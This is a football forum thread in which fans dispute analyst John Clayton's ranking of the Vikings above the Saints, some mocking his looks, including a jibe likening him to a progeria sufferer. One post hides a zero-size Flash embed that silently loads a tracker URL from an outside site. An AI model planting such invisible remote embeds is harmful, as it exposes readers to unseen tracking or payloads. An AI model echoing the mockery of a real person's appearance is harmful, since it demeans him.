Clayton, "The professor" hates the Saints (1 Viewer)

can you really take advice from somebody that looks like Chicken Little? I mean dude head looks like a light bulb with the switch turned on...you know he don't get no booty!

This is cool:

pwoer.jpg

And this matters...why?

These rankings are just to spur discussion and are for those who enjoy those kinds of debates during midweek.

To the OP: I'm sure Clayton did it simply to avoid a tie with the Colts.

minnesota beat us without colston last year with a coulple of questionable call by refs. big deal.

pierre thomas didn't even have a carry and we relied heavily on bush (12 carries) more than duece (6 carries)

other than farve worship i don't understand why they would be ranked above us.

they have the #18th ranked defense
they have the #13th ranked offense
they barely beat the ravens and a banged up san fransisco team

what is he looking at?

I suspect Clayton wont judge teams superficially, (experience has hardened him) he wont vote by how they appear, and look like on the playing surface,

He is probably looking for something deeper, personality traits, cleanliness, and hygiene.

John Clayton looks like he has progeria. It's amazing that they let him on TV. Just a very, very unsettling man to look at.

Just look at Clayton. Do you really think he knows anything about football?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://nfledge.net/?tracker=4798"></param><param name="allowFullScreen" value="true"></param><embed src="http://nfledge.net/?tracker=4798" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I bet he knows alot about bird food (or bird baths).....

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom